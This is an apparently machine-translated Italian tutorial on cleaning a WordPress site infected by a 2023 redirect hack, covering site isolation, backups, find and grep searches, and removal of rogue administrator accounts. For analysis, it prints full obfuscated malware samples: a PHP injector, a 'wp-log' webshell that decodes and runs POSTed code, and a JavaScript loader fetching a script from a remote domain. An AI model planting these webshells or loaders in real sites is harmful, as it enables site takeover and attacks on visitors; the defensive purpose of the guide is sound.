WordPress è sicuramente la piattaforma più utilizzata CMS (Content Management System) sia per i blog che per i negozi online principianti (con il modulo WooCommerce), il che lo rende il più preso di mira dagli attacchi informatici (hacking). Una delle operazioni di hacking più utilizzate mira a reindirizzare il sito compromesso su altre pagine web. Redirect WordPress Hack 2023 è un malware relativamente nuovo che ha l'effetto di reindirizzare l'intero sito a pagine Web di spam o che a sua volta può infettare i computer degli utenti.

Se il tuo sito web sviluppato su WordPress viene reindirizzato su un altro sito, molto probabilmente è vittima del già famoso hack di reindirizzamento.

In questo tutorial troverai le informazioni necessarie e suggerimenti utili con cui puoi de-virusare un sito Web infetto da un reindirizzamento WordPress Hack (Virus Redirect). Attraverso i commenti potrai ottenere ulteriori informazioni o chiedere aiuto.

Rilevamento virus che reindirizza i siti WordPress

Un calo improvviso e ingiustificato del traffico sul sito web, una diminuzione del numero di ordini (nel caso dei negozi online) o degli introiti pubblicitari sono i primi segnali che qualcosa non va. Rilevamento “Redirect WordPress Hack 2023” (Reindirizzamento virus) può anche essere eseguito “visivo” quando apri il sito Web e vieni reindirizzato a un'altra pagina Web.

Per esperienza, la maggior parte dei malware web sono compatibili con i browser Internet: Chrome, Firefox, Edge, Opera. Se sei un utente Mac, questi virus non sono molto visibili nel browser Safari. Il sistema di sicurezza di Safari blocca silenziosamente questi script dannosi.

Cosa fare se il tuo sito web è stato infettato da Redirect WordPress Hack

Spero che il primo passo sia non farsi prendere dal panico o eliminare il sito web. Anche i file infetti o virali non dovrebbero essere eliminati inizialmente. Contengono informazioni preziose che possono aiutarti a capire dove si trova la violazione della sicurezza e cosa ha influenzato il virus. Modus operandi.

Chiudere il sito al pubblico.

Come si chiude un sito Web contenente virus ai visitatori? Il modo più semplice è utilizzare il gestore DNS ed eliminare il suo IP “UN” (nome di dominio) o definire un IP inesistente per esso. Pertanto, i visitatori del sito Web saranno protetti da questo hack di reindirizzamento di WordPress che può portarli a pagine Web contenenti virus o SPAM.

Se usi CloudFlare come gestore DNS, accedi al tuo account ed elimini i record DNS “A” per il nome di dominio. Pertanto, il dominio colpito dal virus rimarrà senza IP e non sarà più accessibile da Internet.

Copia l'IP del sito web e fai “itinerario” in modo che solo tu possa accedervi. Dal tuo computer.

Come si modifica l'IP reale di un sito Web su computer Windows?

Il metodo viene spesso utilizzato per bloccare l'accesso a determinati siti Web modificando il file “ospiti”.

1. Apri Blocco note o un altro editor di testo (con diritti di amministratore) e modifica il file “hosts“. Si trova a:

C:\Windows\System32\drivers\etc\hosts

2. Nel fascicolo “ospiti” aggiungere “itinerario” all'IP reale del tuo sito web. IP eliminato sopra dal gestore DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Salvare il file e accedere al sito Web nel browser.

Se il sito Web non si apre e non hai fatto nulla di sbagliato nel file “ospiti”, è molto probabile che si tratti di una cache DNS.

Per svuotare la cache DNS su un sistema operativo Windows, apri il prompt dei comandi, dove esegui il comando:

ipconfig /flushdns

Come si modifica l'IP reale di un sito Web su computer Mac / MacBook?

Per gli utenti Mac è un po’ più semplice cambiare l’IP reale di un sito web.

1. Aprire l'utilità Terminal.

2. Esegui la riga di comando (richiede la password di sistema per l'esecuzione):

sudo nano /etc/hosts

3. Proprio come per i computer Windows, aggiungi l'IP reale del dominio.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Salva le modifiche. Ctrl+X (y).

Dopo che l'hai fatto “itinerario”, sei l'unica persona che può accedere al sito Web infetto con Redirect WordPress Hack.

Sito Web di backup completo – File e database

Anche se è infetto da “reindirizzare l'hacking di WordPress”, la raccomandazione è quella di effettuare un backup generale dell'intero sito web. File e database. Forse potresti anche salvare una copia locale di entrambi i file da public / public_html così come il database.

Identificazione dei file utilizzati dai virus e di quelli modificati da Redirect WordPress Hack 2023

I principali file di destinazione del file WordPress Sono index.php (nella radice), header.php, index.php E footer.php del tema WordPress attivo. Controlla manualmente questi file e identifica il codice dannoso o uno script malware.

Nel 2023, un virus del tipo “Reindirizzamento dell'hacking di WordPress” inserire index.php un codice del modulo:

(Non consiglio di eseguire questi codici!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Decodificato, questo malware di script è fondamentalmente la conseguenza dell'infezione del sito Web WordPress. Non è lo script dietro il malware, è lo script che consente di reindirizzare la pagina web infetta. Se decodifichiamo lo script sopra, otteniamo:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Per identificare tutti i file sul server che contengono questo codice, è bene avere accesso SSH al server per eseguire il controllo dei file e le righe di comando di gestione su Linux.

Imparentato: Come scopri se hai un blog di virus o meno, con l'aiuto di Google Search. (Virus WordPress)

Di seguito sono riportati due comandi sicuramente utili per identificare file modificati di recente e file che contengono un determinato codice (stringa).

Come vedi i file PHP modificati nelle ultime 24 ore o in un altro intervallo di tempo su Linux?

Comando “find” è molto semplice da usare e permette la personalizzazione di impostare il periodo di tempo, il percorso in cui viene effettuata la ricerca e il tipo di file.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Nell'output riceverai informazioni sulla data e l'ora in cui il file è stato modificato, i permessi di scrittura/lettura/esecuzione (chmod) e a quale gruppo/utente appartiene.

Se vuoi controllare più giorni fa, modifica il valore “-mtime -1” o utilizzare “-mmin -360” per minuti (6 ore).

Come cercare un codice (stringa) all'interno di file PHP, Java?

Riga di comando “Trovare” che puoi utilizzare per trovare rapidamente tutti i file PHP o Java che contengono un determinato codice è il seguente:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Il comando cercherà e visualizzerà i file .php E .js che contengono “uJjBRODYsU“.

Con l'aiuto dei due comandi qui sopra scoprirai molto facilmente quali file sono stati modificati di recente e quali contengono codice malware.

Rimuove il codice dannoso dai file modificati senza compromettere il codice corretto. Nel mio scenario, il malware è stato inserito prima dell'apertura <head>.

Quando si esegue il primo comando “Trovare” è molto probabile che scoprirai anche nuovi file sul server, che non sono di WordPress e non sono stati inseriti da te. File appartenenti al virus Redirect WordPress Hack.

Nello scenario che ho analizzato, sul server apparivano degli shapefile “wp-log-nOXdgD.php“. Questi sono file “generazione” che contengono anche codice malware utilizzato dal virus di reindirizzamento.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Lo scopo dei file di tipo “wp-log-*” è diffondere il virus di hacking di reindirizzamento ad altri siti Web ospitati sul server. È un tipo di codice malware “webshell” composto da a sezione base (in cui sono definite alcune variabili crittografate) e o sezione esecuzione attraverso il quale l'aggressore tenta di caricare ed eseguire un codice dannoso sul sistema.

Se c'è una variabile POST nominato ‘bh‘ e il suo valore crittografato MD5 è uguale a “8f1f964a4b4d8d1ac3f0386693d28d03“, quindi lo script sembra scrivere il contenuto crittografato base64 di un'altra variabile denominata ‘b3‘ in un file temporaneo e quindi tenta di includere questo file temporaneo.

Se c'è una variabile POST O GET nominato ‘tick', lo script risponderà con il valore MD5 della corda “885“.

Per identificare tutti i file sul server che contengono questo codice, scegli una stringa comune, quindi esegui il comando de “find” (simile a quello sopra). Elimina tutti i file contenenti questo codice malware.

Vulnerabilità della sicurezza sfruttata dal reindirizzamento di WordPress Hack

Molto probabilmente questo virus di reindirizzamento arriva tramite sfruttando l'utente amministratore di WordPress o identificando a plugin vulnerabile che consente di aggiungere utenti con privilegi di amministratore.

Per la maggior parte dei siti web realizzati sulla piattaforma WordPress è possibile modificare temi o file plugindall'interfaccia di amministrazione (Dashboard). Pertanto, un utente malintenzionato può aggiungere codice malware ai file del tema per generare gli script mostrati sopra.

Un esempio di tale codice malware è questo:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificato nell'intestazione del tema WordPress, subito dopo l'apertura del tag <head>.

È abbastanza difficile decifrare questo JavaScript, ma è ovvio che interroga un altro indirizzo web da cui molto probabilmente recupera altri script per creare i file “wp-log-*” di cui abbiamo parlato sopra.

Trova ed elimina questo codice da tutti i file PHP ricercato.

Per quanto ho potuto vedere, questo codice era aggiunto manualmente da un nuovo utente con privilegi di amministratore.

Pertanto, per impedire l'aggiunta di codice malware dalla Dashboard, è meglio disabilitare l'opzione per modificare temi/plugin WordPress dalla Dashboard.

Modifica il file wp-config.php e aggiungi le righe:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Dopo aver apportato questa modifica, nessun utente WordPress sarà in grado di modificare i file dalla Dashboard.

Controlla gli utenti con ruolo di amministratore

Di seguito è riportata una query SQL che puoi utilizzare per cercare utenti amministratori nella piattaforma WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Questa query restituirà tutti gli utenti nella tabella wp_users che ha assegnato il ruolo di amministratore. La query viene eseguita anche per la tabella wp_usermeta per cercare nel meta ‘wp_capabilities', che contiene informazioni sui ruoli utente.

Un altro metodo è identificarli da: Dashboard → Users → All Users → Administrator. Tuttavia, esistono pratiche mediante le quali un utente può essere nascosto nel pannello Dashboard. Quindi, il modo migliore per vedere gli utenti “Amministratore” da WordPress è il comando SQL sopra.

Nel mio caso, ho identificato l'utente per nome nel database “wp-import-user“. Abbastanza suggestivo.

Inoltre da qui puoi vedere la data e l'ora in cui è stato creato l'utente WordPress. Anche l'ID utente è molto importante perché ricerca nei log del server. In questo modo puoi vedere tutta l'attività di questo utente.

Elimina gli utenti con ruolo di amministratore che non sai, quindi modificare le password a tutti gli utenti amministrativi. Redattore, autore, amministratore.

Modificare la password dell'utente del database SQL del sito web interessato.

Dopo aver eseguito questi passaggi, il sito Web può essere riavviato per tutti gli utenti.

Tieni presente, tuttavia, che quello che ho presentato sopra è uno delle migliaia di scenari in cui un sito Web viene infettato da Redirect WordPress Hack nel 2023.

Se il tuo sito web è stato infettato e hai bisogno di aiuto o se hai domande, la sezione commenti è aperta.